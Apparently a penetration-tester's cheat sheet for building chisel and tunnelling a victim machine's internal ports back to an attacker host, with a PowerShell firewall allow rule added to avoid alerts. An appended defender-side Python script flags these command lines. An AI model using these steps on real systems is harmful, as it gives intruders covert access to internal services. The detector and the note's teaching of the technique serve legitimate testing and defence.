Chisel Port Forwarding

sudo apt install golang

git clone https://github.com/jpillora/chisel.git

cd chisel/

Compile Chisel for Linux:

go build

Compile Chisel for Windows:

env GOOS=windows GOARCH=amd64 go build -o chisel.exe -ldflags "-s -w"

- Look for internal open ports:

  • Linux

ss -tln

ss -tl

ss -nltp

netstat -nat

  • Windows

netstat -oat

netstat -ano

netstat -aton

- Local Port Forwarding

  • Attacker:

Download the chisel release matching the victim machine's OS (Windows or Linux) from https://github.com/jpillora/chisel/releases, then transfer it to the victim machine. Start the server on our machine:

chisel server --reverse --port 9999

  • Victim:

chisel client {My IP}:9999 R:{Port to open on our machine}:127.0.0.1:{Found internal open port}

Example:

.\chisel.exe client {My IP}:9999 R:8000:127.0.0.1:8000

Here we are forwarding the victim's port 8000 to our port 8000.

- Reverse Port Forwarding

Against a Windows target with the Windows firewall enabled, the user is shown an alert when an application attempts to listen on a port that is not explicitly allowed. Allowing access requires local admin privileges, and clicking Cancel creates an explicit block rule. We must therefore create an allow rule before running a reverse port forward, using either netsh or New-NetFirewallRule, since adding and removing rules does not create a visible alert.

powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

Then to delete that rule:

powershell Remove-NetFirewallRule -DisplayName "8080-In"
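
A defender-side sketch, added here and not part of the original notes or the chisel project: it decodes the remote syntax used above (with R:, the server opens the listener and the client side reaches the target) and flags the three command shapes from this page in process-creation command lines. The function names, finding labels and sample lines are constructed for illustration.

```python
import re
import shlex
# chisel remote: [R:][listen-host:]listen-port:target-host:target-port[/proto]
# Shorthand forms ("3000", "socks") and IPv6 hosts are out of scope here.
REMOTE_RE = re.compile(
    r"^(R:)?(?:[^:/]+:)?(\d{1,5}):([^:/]+):(\d{1,5})(?:/(?:tcp|udp))?$")

def parse_remote(spec):
    """Decode one remote; with the R: prefix the *server* opens the listener."""
    m = REMOTE_RE.match(spec)
    if not m:
        return None
    reverse, lport, thost, tport = m.groups()
    return {"listener": "server" if reverse else "client",
            "listen_port": int(lport),
            "target": f"{thost}:{tport}",
            "reached_from": "client" if reverse else "server"}

def value_after(lowered, name):
    """Lower-cased value that follows a flag/parameter name, or None."""
    i = lowered.index(name) if name in lowered else -1
    return lowered[i + 1] if 0 <= i < len(lowered) - 1 else None

def analyze(cmdline):
    """Findings for one command line, keyed on argument shape, not binary name."""
    tokens = [t.strip("\"'") for t in shlex.split(cmdline, posix=False)]
    lowered = [t.lower() for t in tokens]
    findings = []
    if "server" in lowered and "--reverse" in lowered:
        findings.append({"type": "reverse_tunnel_server",
                         "port": value_after(lowered, "--port")})
    if "client" in lowered:
        remotes = map(parse_remote, tokens[lowered.index("client") + 1:])
        findings += [{"type": "tunnel_client", **r} for r in remotes if r]
    if ("new-netfirewallrule" in lowered
            and value_after(lowered, "-direction") == "inbound"
            and value_after(lowered, "-action") == "allow"):
        findings.append({"type": "inbound_allow_rule", "port": value_after(lowered, "-localport")})
    return findings

# Constructed command lines (192.0.2.10 is a documentation address).
SAMPLES = [
    r".\chisel.exe client 192.0.2.10:9999 R:8000:127.0.0.1:8000",
    "chisel server --reverse --port 9999",
    'powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound '
    "-Protocol TCP -Action Allow -LocalPort 8080",
    "ss -tln",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```

Matching on argument shape rather than on the executable name keeps the check working when the binary is renamed; the inbound allow rule is worth correlating with a tunnel finding on the same host.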
